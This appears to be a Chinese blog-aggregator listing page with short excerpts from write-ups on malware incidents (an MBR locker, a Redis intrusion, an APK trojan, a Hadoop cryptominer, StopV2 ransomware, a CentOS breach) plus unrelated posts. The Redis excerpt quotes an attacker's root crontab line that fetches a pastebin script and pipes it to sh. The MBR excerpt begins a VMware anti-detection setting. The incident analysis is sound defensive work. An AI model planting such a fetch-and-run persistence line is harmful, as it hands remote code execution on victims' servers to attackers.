原文:記一次MBR鎖機病毒分析

有一天,在機緣巧合之下我獲得了一個鎖機軟件 是多巧合阿喂 ,然后興高采烈的把它拖入了虛擬機里蹂躪 amp gt amp lt 。 很巧,軟件有虛擬機檢測。。。 Emmmm好吧,隨便過一下。。。 我用的虛擬機是VMware ,網上查到了一段過檢測的代碼: isolation.tools.setVersion.disable amp quot TRUE amp quot isolation.tools ...

2017-12-07 18:17 0 1081 推薦指數:

查看詳情

一次redis病毒分析筆記

起因 偶然間發現redis里有一個陌生key:tightsoft,它的值是:*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh 看key名就知道這肯定不是我們存的,再看value我警覺了,這是要定時執行腳本啊。 分析 ...

Wed Sep 05 23:13:00 CST 2018 2 944
一次簡單的分析APK病毒木馬

寫個筆記記錄一下,起因是朋友在QQ上發了個連接叫我看看 安不安全,叫我幫他看看,反正在店里待着也沒生意,那就順便看看咯。 打開這個網址 會自動彈出下載一個名為OOXX的APK安裝包。 ...

Fri Jan 08 00:43:00 CST 2016 1 5283
一次病毒分析之旅

0x00 前言 這個病毒應該是比較簡單的,別人給我的樣本,讓我幫忙看看,看樣子是很早的一個病毒,針對Windows XP系統的,行為分析很簡單,但是想着不能就僅僅分析關鍵點,要不就把整個結構給逆向出來,弄了兩天,搞的差不多了,簡單的記錄一下。 0x01 基本介紹 整個病毒是4個文件組成 ...

Tue Jan 05 04:58:00 CST 2016 17 4101
一次部署Hadoop后遭受kthreaddi挖礦病毒

雲服務器在部署Hadoop后便被黑了,查看進程發現了kthreaddi占滿了CPU。 kill掉這個進程后還會自己重啟,猜測是設置了定時啟動任務。 查看定時器,查看定時器中的文件,發現文件不存在 ...

Sat May 08 23:59:00 CST 2021 0 1526
一次親身體驗的勒索病毒事件 StopV2勒索病毒

昨天給筆記本裝了 windows server 2016 操作系統,配置的差不多之后,想使用注冊激活系統。使用了幾個本地以前下載的注冊激活失敗后,嘗試上網搜索。 於是找到下面這個網站(這個網站下載的注冊是勒索病毒,千萬不要在這里下載) 下載的注冊機運行后,電腦自帶 ...

Thu Feb 27 07:32:00 CST 2020 2 5370
一次華為

介紹 華為試分為 3 題,兩題 100 分,一題 200 分,壓線 150 分算你過,時間150分鍾,支持多語言環境(牛客網),考試時需全程打開攝像頭,電腦屏幕分享,手打開某小程序(可用計算器)不退出,可用本地 IDE, 會有一些測試題給你熟悉環境預熱的。 備注: 由於腦容量有限,題目具體 ...

Fri Mar 05 02:11:00 CST 2021 0 558
一次針對Centos的入侵分析

離開廠家多年,很久沒有碰這類事件了。 回顧:  2017年9月末,接到一個朋友轉述的求助信息。他一客戶的服務器被黑了。服務器上所跑業務上的金額也全部被人轉走了。 朋友的客戶加我后,沒頭沒尾 ...

Thu Oct 05 23:59:00 CST 2017 0 1761
一次Java的內存泄露分析

當前環境 jdk == 1.8 httpasyncclient == 4.1.3 代碼地址 git 地址:https://github.com/jasonGeng88/java-n ...

Sat Oct 07 00:23:00 CST 2017 1 4134
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM